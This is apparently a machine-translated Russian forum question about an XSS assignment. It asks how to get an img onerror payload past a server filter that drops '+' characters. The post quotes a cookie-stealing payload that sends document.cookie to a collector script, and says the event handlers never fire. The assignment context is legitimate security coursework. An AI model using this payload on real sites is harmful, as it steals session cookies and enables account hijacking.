Я пытаюсь выполнить XSS-атаку для назначения, внедряя некоторый код, однако сервер настроен для удаления большинства тегов HTML, но я могу ввести с помощью тега img
и onerror.При инъекции я не могу понять правильный синтаксис, так как он убирает мои «+» в моем строковом добавлении (пытаясь прикрепить cookie к источнику, который я использую).
<img src="img.gif"
onerror="var img = document.createElement('img'); img.src='http://localhost/cookiesteal.php?cookie='+ document.cookie;">
Когда япроверьте это после внедрения (в элементе inspect), он показывает сценарий, но символ плюса в конце отсутствует.Есть ли другой способ добавить этот файл cookie в img.src без использования +?
ОБНОВЛЕНИЕ:
Я получил плюс там, и теперь прослушиватель событий активирован.Но я попытался использовать onerror, onload, onmouseover, и ничего не активирует код, я не получаю куки администратора.